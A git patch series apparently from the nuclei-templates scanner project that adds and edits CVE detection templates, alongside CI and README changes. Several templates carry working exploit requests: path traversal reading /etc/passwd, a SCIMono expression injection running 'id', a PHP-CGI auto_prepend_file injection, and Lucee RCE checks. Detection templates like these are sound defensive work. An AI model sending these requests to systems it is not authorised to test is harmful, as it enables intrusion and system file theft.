cves/2021/CVE-2021-21307.yaml | 27 ++++++++++++++++++++++----- 1 file changed, 22 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml index 92e10c91a5..e815a8471b 100644 --- a/cves/2021/CVE-2021-21307.yaml +++ b/cves/2021/CVE-2021-21307.yaml @@ -1,11 +1,15 @@ id: CVE-2021-21307 info: - name: Adobe Lucee RCE + name: Remote Code Exploit in Lucee Admin author: dhiyaneshDk - severity: high - reference: https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md - tags: lucee,adobe,cve2021,rce + severity: critical + description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator. + reference: | + - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r + - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-21307 + tags: cve,cve2021,rce,lucee,adobe requests: - raw: @@ -71,6 +75,19 @@ requests: matchers-condition: and matchers: + - type: word + words: + - "uid=" + - "gid=" + - "groups=" + part: body + condition: and + + - type: status + status: + - 200 + + extractors: - type: regex regex: - - "uid=" + - "(u|g)id=.*" \ No newline at end of file From 3088fb54318ffe98063b8b034c5509828e8254fd Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 18 Jul 2021 22:39:37 +0530 Subject: [PATCH 0810/4083] Removing CVE-2021-24213 As per blog - https://bentl.ee/posts/cve-givewp/ > This vulnerability requires user interaction from an admin in order to be exploited. --- cves/2021/CVE-2021-24213.yaml | 29 ----------------------------- 1 file changed, 29 deletions(-) delete mode 100644 cves/2021/CVE-2021-24213.yaml diff --git a/cves/2021/CVE-2021-24213.yaml b/cves/2021/CVE-2021-24213.yaml deleted file mode 100644 index 70284f7996..0000000000 --- a/cves/2021/CVE-2021-24213.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2021-24213 - -info: - name: GiveWP 2.9.7 Reflected Cross-Site Scripting - author: dhiyaneshDk - severity: medium - reference: https://packetstormsecurity.com/files/161933/WordPress-GiveWP-2.9.7-Cross-Site-Scripting.html - tags: cve,cve2021,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/edit.php?s=%22%3E&start-date&end-date&form_id=0&action=-1&paged=1&give_action=delete_bulk_donor&orderby=id&order=DESC&action2=-1&post_type=give_forms&page=give-donors&view=donors' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 From be655ffd69e0fb0cb5394d094978c14a3c9fc724 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 18 Jul 2021 22:41:13 +0530 Subject: [PATCH 0811/4083] No more manual updates with tags support --- workflows/lucee-workflow.yaml | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/workflows/lucee-workflow.yaml b/workflows/lucee-workflow.yaml index 51ad90f94b..6dcd34dc47 100644 --- a/workflows/lucee-workflow.yaml +++ b/workflows/lucee-workflow.yaml @@ -9,7 +9,4 @@ info: workflows: - template: technologies/lucee-detect.yaml subtemplates: - - template: technologies/default-lucee-page.yaml - - template: exposed-panels/lucee-login.yaml - - template: exposures/logs/lucee-stack-trace.yaml - - template: cve/2021/CVE-2021-21307.yaml + - tags: lucee \ No newline at end of file From 27b8b08b42f6f9ada541835fb79bafed0c1abee3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 18 Jul 2021 17:13:47 +0000 Subject: [PATCH 0812/4083] Auto Update README [Sun Jul 18 17:13:47 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b6fb139ccd..44b521a302 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | +| cves | 461 | vulnerabilities | 236 | exposed-panels | 201 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1596 files**. +**134 directories, 1598 files**.
    - +{get_top10()} 📖 Documentation From 31bae65ed1a001b83418fe2d3da3daf531e39ea4 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jul 2021 14:50:15 +0700 Subject: [PATCH 0928/4083] Add getting top 10 function --- .github/scripts/update-readme.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.github/scripts/update-readme.py b/.github/scripts/update-readme.py index 23100c718e..f3bb1efde9 100644 --- a/.github/scripts/update-readme.py +++ b/.github/scripts/update-readme.py @@ -8,6 +8,10 @@ def countTpl(path): def command(args, start=None, end=None): return "\n".join(subprocess.run(args, text=True, capture_output=True).stdout.split("\n")[start:end])[:-1] +def get_top10(): + TOP10 = command(["cat", "TOP-10.md"]) + return "## Top 10 Contributors\n\n" + TOP10 if len(TOP10) > 0 else "" + if __name__ == "__main__": version = command(["git", "describe", "--tags", "--abbrev=0"]) template = eval(open(".github/scripts/README.tmpl", "r").read()) From 38886322c3efb7d2774c92b2af70b506c4676c8e Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jul 2021 14:50:37 +0700 Subject: [PATCH 0929/4083] Update template stats workflow --- .github/workflows/templates-stats.yml | 28 ++++++++++++++++++--------- 1 file changed, 19 insertions(+), 9 deletions(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index ff20e740ed..e647edb2f5 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -1,9 +1,8 @@ name: 🗒 Templates Stats on: - create: - tags: - - v* + schedule: + - cron: "0 0 * * *" workflow_dispatch: jobs: @@ -12,6 +11,8 @@ jobs: steps: - name: Checkout Repo uses: actions/checkout@master + with: + fetch-depth: 0 - name: Setup golang uses: actions/setup-go@v2 @@ -35,19 +36,28 @@ jobs: - name: Markdown Stats run: | - templates-stats -output TEMPLATES-STATS.md -path /home/runner/work/nuclei-templates/nuclei-templates/ + templates-stats -output TEMPLATES-STATS.md -path {{ github.workspace }} shell: bash - name: JSON Stats run: | - templates-stats -output TEMPLATES-STATS.json -json -path /home/runner/work/nuclei-templates/nuclei-templates/ + templates-stats -output TEMPLATES-STATS.json -json -path {{ github.workspace }} shell: bash - - name: Commit files + - name: Top 10 Stats run: | - git pull --tags -f - git add TEMPLATES-STATS.md - git add TEMPLATES-STATS.json + templates-stats -output TOP-10.md -top 10 -path {{ github.workspace }} + shell: bash + + - name: Get statistical changes + id: stats + run: echo "::set-output name=changes::$(git status -s | wc -l)" + + - name: Commit files + if: steps.stats.outputs.changes > 0 + run: | + git add TEMPLATES-STATS.* + git add TOP-10.md git config --local user.email "action@github.com" git config --local user.name "GitHub Action" git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a From 3dfccad5f187ee09c4e3da2080436306db04fb3a Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jul 2021 14:55:28 +0700 Subject: [PATCH 0930/4083] Add workflow dispatch trigger --- .github/workflows/update-readme.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/update-readme.yml b/.github/workflows/update-readme.yml index f837ccfd4d..0f59dd9677 100644 --- a/.github/workflows/update-readme.yml +++ b/.github/workflows/update-readme.yml @@ -4,6 +4,7 @@ on: create: tags: - v* + workflow_dispatch: jobs: build: From 6d315e62b55daf6533a669376039e82a309821ed Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jul 2021 14:57:07 +0700 Subject: [PATCH 0931/4083] Using variable for heading instead --- .github/scripts/update-readme.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/scripts/update-readme.py b/.github/scripts/update-readme.py index f3bb1efde9..814459587f 100644 --- a/.github/scripts/update-readme.py +++ b/.github/scripts/update-readme.py @@ -9,8 +9,9 @@ def command(args, start=None, end=None): return "\n".join(subprocess.run(args, text=True, capture_output=True).stdout.split("\n")[start:end])[:-1] def get_top10(): + HEADER = "## Top 10 Contributors\n\n" TOP10 = command(["cat", "TOP-10.md"]) - return "## Top 10 Contributors\n\n" + TOP10 if len(TOP10) > 0 else "" + return HEADER + TOP10 if len(TOP10) > 0 else "" if __name__ == "__main__": version = command(["git", "describe", "--tags", "--abbrev=0"]) From aec5340126d0b148addcf911cd7308617f34d03d Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jul 2021 15:22:20 +0700 Subject: [PATCH 0932/4083] Revert scheduled trigger --- .github/workflows/templates-stats.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index e647edb2f5..a701cd34d1 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -1,8 +1,9 @@ name: 🗒 Templates Stats on: - schedule: - - cron: "0 0 * * *" + create: + tags: + - v* workflow_dispatch: jobs: From 0af69ac0fdf8364ef66b2c8047c41571ce0f2c22 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 14:15:45 +0530 Subject: [PATCH 0933/4083] Update CVE-2021-21479.yaml --- cves/2021/CVE-2021-21479.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml index e6fc7a8ee6..3fa32c53bd 100644 --- a/cves/2021/CVE-2021-21479.yaml +++ b/cves/2021/CVE-2021-21479.yaml @@ -24,6 +24,3 @@ requests: - "has invalid value!" part: body condition: and - - type: status - status: - - 400 From b10b8a61b845ac81e591fa0ca991341c09a2eb53 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 14:16:30 +0530 Subject: [PATCH 0934/4083] Update CVE-2021-21479.yaml --- cves/2021/CVE-2021-21479.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml index 3fa32c53bd..490f5cbf73 100644 --- a/cves/2021/CVE-2021-21479.yaml +++ b/cves/2021/CVE-2021-21479.yaml @@ -15,7 +15,6 @@ requests: path: - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D" - matchers-condition: and matchers: - type: word words: From d738d2c9a30cb3926be2441fab60599f22e08a91 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 14:18:21 +0530 Subject: [PATCH 0935/4083] Update CVE-2021-21479.yaml --- cves/2021/CVE-2021-21479.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml index 490f5cbf73..5aded3fcc7 100644 --- a/cves/2021/CVE-2021-21479.yaml +++ b/cves/2021/CVE-2021-21479.yaml @@ -21,5 +21,6 @@ requests: - "The attribute value" - "java.lang.UNIXProcess@" - "has invalid value!" + - '"status" : "400"' part: body condition: and From c63bb91bdbfa4888c549daf4193f89c9129d434f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 20 Jul 2021 15:52:10 +0700 Subject: [PATCH 0936/4083] Create CVE-2021-23241.yaml --- cves/2021/CVE-2021-23241.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2021/CVE-2021-23241.yaml diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml new file mode 100644 index 0000000000..e5356a9692 --- /dev/null +++ b/cves/2021/CVE-2021-23241.yaml @@ -0,0 +1,23 @@ +id: CVE-2021-23241 + +info: + name: Mercury Router Web Server Directory Traversal + author: daffainfo + severity: medium + reference: https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md + tags: cve,cve2021,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/loginLess/../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + part: body + - type: status + status: + - 200 From 1fc173982d241e8957a13fab6aa45cf504f62439 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 14:22:31 +0530 Subject: [PATCH 0937/4083] Update CVE-2021-21479.yaml --- cves/2021/CVE-2021-21479.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml index 5aded3fcc7..5d60f46f48 100644 --- a/cves/2021/CVE-2021-21479.yaml +++ b/cves/2021/CVE-2021-21479.yaml @@ -8,7 +8,7 @@ info: description: | In SCIMono before 0.0.19, it is possible for an attacker to inject and execute java expression compromising the availability and integrity of the system. - tags: cve,cve2021,scim,rce + tags: cve,cve2021,scimono,rce requests: - method: GET From 86a7fad73a1ee7f3d92cd214124b6323b1ae22ac Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 14:23:39 +0530 Subject: [PATCH 0938/4083] Update CVE-2021-23241.yaml --- cves/2021/CVE-2021-23241.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml index e5356a9692..fe90d59dcc 100644 --- a/cves/2021/CVE-2021-23241.yaml +++ b/cves/2021/CVE-2021-23241.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium reference: https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md - tags: cve,cve2021,iot,lfi + tags: cve,cve2021,iot,lfi,router requests: - method: GET From 41c9c3e3f9fe69bc7de6da96a628827b57298df4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 14:25:37 +0530 Subject: [PATCH 0939/4083] Update CVE-2021-23241.yaml --- cves/2021/CVE-2021-23241.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml index fe90d59dcc..e65d7120b2 100644 --- a/cves/2021/CVE-2021-23241.yaml +++ b/cves/2021/CVE-2021-23241.yaml @@ -4,7 +4,11 @@ info: name: Mercury Router Web Server Directory Traversal author: daffainfo severity: medium - reference: https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md + description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI. + reference: | + - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-23241 +reference: tags: cve,cve2021,iot,lfi,router requests: From 89f06194198016aa4a4041be72b3ce4f983ce858 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 20 Jul 2021 09:15:09 +0000 Subject: [PATCH 0940/4083] Auto Update README [Tue Jul 20 09:15:09 UTC 2021] :robot: --- README.md | 32 +++++++++++++++++++++++++------- 1 file changed, 25 insertions(+), 7 deletions(-) diff --git a/README.md b/README.md index 740381b4d9..6d946b7ac1 100644 --- a/README.md +++ b/README.md @@ -24,7 +24,9 @@ Nuclei Templates ---- -Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine. This repository stores various templates for the scanner provided by our team, as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list. +Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine. +This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community. +We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list. ## Nuclei Templates overview @@ -38,42 +40,58 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 468 | vulnerabilities | 234 | exposed-panels | 202 | +| cves | 475 | vulnerabilities | 229 | exposed-panels | 202 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1604 files**. +**134 directories, 1609 files**. +## Top 10 Contributors +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| +| cve | 467 | dhiyaneshdk | 202 | cves | 473 | info | 453 | http | 1409 | +| panel | 201 | pdteam | 184 | vulnerabilities | 230 | high | 395 | file | 42 | +| xss | 169 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 | +| wordpress | 164 | dwisiswant0 | 113 | exposures | 150 | critical | 187 | dns | 10 | +| rce | 162 | geeknik | 89 | technologies | 129 | low | 150 | | | +| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | | +| cve2020 | 137 | madrobot | 59 | takeovers | 70 | | | | | +| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | | +| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | | +| cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | | 📖 Documentation ----- Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates. -We have also added a set of example templates to help you understand how things work. +We have also added a set of templates to help you understand how things work. 💪 Contributions ----- -Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. +Nuclei-templates is powered by major contributions from the community. +[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. 💬 Discussion ----- -Have questions / doubts / ideas to discuss? Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board. +Have questions / doubts / ideas to discuss? +Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board. 👨‍💻 Community ----- -You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery. +You are welcome to join our [Discord Community](https://discord.gg/KECAGdH). +You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery. 💡 Notes ----- From 2b156573bd42be06eae71ed23d71e61d030cb747 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 20 Jul 2021 16:22:18 +0700 Subject: [PATCH 0941/4083] Update CVE-2018-3760.yaml --- cves/2018/CVE-2018-3760.yaml | 43 +++++++++++++++++++++++++++--------- 1 file changed, 33 insertions(+), 10 deletions(-) diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml index 779c5ee4ec..26e04286ed 100644 --- a/cves/2018/CVE-2018-3760.yaml +++ b/cves/2018/CVE-2018-3760.yaml @@ -1,22 +1,45 @@ id: CVE-2018-3760 info: - name: Rails CVE-2018-3760 - author: 0xrudra + name: Ruby On Rails Path Traversal + author: 0xrudra,pikpikcu severity: high + reference: | + - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760 + - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf + - https://seclists.org/oss-sec/2018/q2/210 + - https://xz.aliyun.com/t/2542 + description: | + Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files. + There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server. tags: cve,cve2018,rails,lfi requests: - - method: GET - path: - - "{{BaseURL}}/assets/file:%2f%2f/etc/passwd" + - raw: + - | + GET /assets/file:%2f%2f/etc/passwd HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 94 + + - | + GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + + extractors: + - type: regex + name: path + internal: true + part: body + regex: + - "/etc/passwd is no longer under a load path: (.*?)," - matchers-condition: and matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status status: - 200 - - type: regex - regex: - - "root:[x*]:0:0:" - part: body From e9f9325fd0f7c60475dfd044e9e6198f0160a5de Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 20 Jul 2021 16:32:27 +0700 Subject: [PATCH 0942/4083] Create CVE-2012-1823.yaml --- cves/2012/CVE-2012-1823.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2012/CVE-2012-1823.yaml diff --git a/cves/2012/CVE-2012-1823.yaml b/cves/2012/CVE-2012-1823.yaml new file mode 100644 index 0000000000..1d71ce7da7 --- /dev/null +++ b/cves/2012/CVE-2012-1823.yaml @@ -0,0 +1,35 @@ +id: CVE-2012-1823 + +info: + name: PHP CGI v5.3.12/5.4.2 RCE + author: pikpikcu + severity: critical + reference: | + - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823 + - https://nvd.nist.gov/vuln/detail/CVE-2012-1823 + description: | + sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. + tags: rce,php,cve,cve2012 + +requests: + - raw: + - | + POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Type: application/x-www-form-urlencoded + Content-Length: 31 + + + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 From 8f8105bb99a62c717938262f56781798dab4a668 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 16:00:00 +0530 Subject: [PATCH 0943/4083] Update CVE-2021-23241.yaml --- cves/2021/CVE-2021-23241.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml index e65d7120b2..7924ec3b46 100644 --- a/cves/2021/CVE-2021-23241.yaml +++ b/cves/2021/CVE-2021-23241.yaml @@ -8,7 +8,6 @@ info: reference: | - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md - https://nvd.nist.gov/vuln/detail/CVE-2021-23241 -reference: tags: cve,cve2021,iot,lfi,router requests: @@ -22,6 +21,7 @@ requests: regex: - "root:[0*]:0:0" part: body + - type: status status: - 200 From f2c22f66b64452b4fde12acfec52bf9201d8dba5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 17:28:29 +0530 Subject: [PATCH 0944/4083] Update CVE-2018-3760.yaml --- cves/2018/CVE-2018-3760.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml index 26e04286ed..ff39f6696f 100644 --- a/cves/2018/CVE-2018-3760.yaml +++ b/cves/2018/CVE-2018-3760.yaml @@ -35,6 +35,7 @@ requests: regex: - "/etc/passwd is no longer under a load path: (.*?)," + matchers-condition: and matchers: - type: regex regex: From 9c8e154b5aedd1ffb4ec88d6341af41ccf027c20 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 20 Jul 2021 19:29:10 +0700 Subject: [PATCH 0945/4083] Update hadoop-unauth.yaml --- misconfiguration/hadoop-unauth.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/misconfiguration/hadoop-unauth.yaml b/misconfiguration/hadoop-unauth.yaml index a897a6b0d7..e47e947914 100644 --- a/misconfiguration/hadoop-unauth.yaml +++ b/misconfiguration/hadoop-unauth.yaml @@ -10,9 +10,12 @@ requests: - method: GET path: - '{{BaseURL}}/ws/v1/cluster/info' + - '{{BaseURL}}/ws/v1/cluster/apps/new-application' + matchers: - type: word words: - 'hadoopVersion' - 'resourceManagerVersionBuiltOn' - condition: and \ No newline at end of file + - 'javax.ws.rs.WebApplicationException' + condition: and From f7d4a642f135afb45139043f9ed95bd370e9b3db Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 20 Jul 2021 20:02:49 +0700 Subject: [PATCH 0946/4083] Create CVE-2020-35580.yaml --- cves/2020/CVE-2020-35580.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cves/2020/CVE-2020-35580.yaml diff --git a/cves/2020/CVE-2020-35580.yaml b/cves/2020/CVE-2020-35580.yaml new file mode 100644 index 0000000000..69ce8b4f8c --- /dev/null +++ b/cves/2020/CVE-2020-35580.yaml @@ -0,0 +1,20 @@ +id: CVE-2020-35580 + +info: + name: SearchBlox < 9.2.2 - Local File Inclusion (LFI) + author: daffainfo + severity: high + description: Local File Inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users. + reference: https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html + tags: cve,cve2020,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd" + + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + part: body From a071981beeffbbf14597a14bf8ce1ddadaf22e7c Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 18:33:13 +0530 Subject: [PATCH 0947/4083] readme update --- .github/scripts/README.tmpl | 20 ++++++++------------ .github/scripts/update-readme.py | 2 +- 2 files changed, 9 insertions(+), 13 deletions(-) diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl index 6c65868500..5f0f630645 100644 --- a/.github/scripts/README.tmpl +++ b/.github/scripts/README.tmpl @@ -32,19 +32,19 @@ We hope that you also contribute by sending templates via **pull requests** or [ ## Nuclei Templates overview -An overview of the nuclei template directory including number of templates associated with each directory. +An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
    -| Templates | Counts | Templates | Counts | Templates | Counts | -| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | {countTpl("cves/*")} | vulnerabilities | {countTpl("vulnerabilities/*")} | exposed-panels | {countTpl("exposed-panels")} | -| takeovers | {countTpl("takeovers")} | exposures | {countTpl("exposures/*")} | technologies | {countTpl("technologies")} | -| misconfiguration | {countTpl("misconfiguration")} | workflows | {countTpl("workflows")} | miscellaneous | {countTpl("miscellaneous")} | -| default-logins | {countTpl("default-logins/*")} | file | {countTpl("file/*")} | dns | {countTpl("dns")} | -| fuzzing | {countTpl("fuzzing")} | helpers | {countTpl("helpers/*")} | iot | {countTpl("iot")} | +## Nuclei Templates Top 10 statistics + + + +
    + +{get_top10()} **{command("tree", -2, None)}**. @@ -52,10 +52,6 @@ An overview of the nuclei template directory including number of templates assoc
